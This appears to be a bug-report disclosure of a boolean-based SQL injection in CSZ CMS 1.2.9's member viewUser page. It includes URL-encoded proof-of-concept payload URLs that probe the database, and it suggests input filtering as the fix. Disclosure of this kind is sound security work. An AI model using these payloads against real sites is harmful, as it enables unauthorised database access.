Hi, I found a front-end sql injection vulnerability in cszcms-1.2.9
The vulnerable code is on cszcms\controllers\Member.php#viewUser
The $this->uri->segment(3) parameter here can be controlled by the user
And no filtering leads to sql injection vulnerability
First register a user in the foreground, then log in, then visit /member/viewUser/%27%7c%7c%69%66%28%28%6c%65%6e%67%74%68%28%64%61%74%61%62%61%73%65%28%29%29%3e%31%29%2c%31%2c%30%29%23
Hi, I found a front-end sql injection vulnerability in cszcms-1.2.9
The vulnerable code is on
cszcms\controllers\Member.php#viewUserThe
$this->uri->segment(3)parameter here can be controlled by the userAnd no filtering leads to sql injection vulnerability
First register a user in the foreground, then log in, then visit
/member/viewUser/%27%7c%7c%69%66%28%28%6c%65%6e%67%74%68%28%64%61%74%61%62%61%73%65%28%29%29%3e%31%29%2c%31%2c%30%29%23The content returned by the webpage is:

visit
/member/viewUser/%27%7c%7c%69%66%28%28%6c%65%6e%67%74%68%28%64%61%74%61%62%61%73%65%28%29%29%3c%31%29%2c%31%2c%30%29%23The content returned by the webpage is:

It's a Boolean-based SQL injection
Suggest: Add a filter function to this parameter
The text was updated successfully, but these errors were encountered: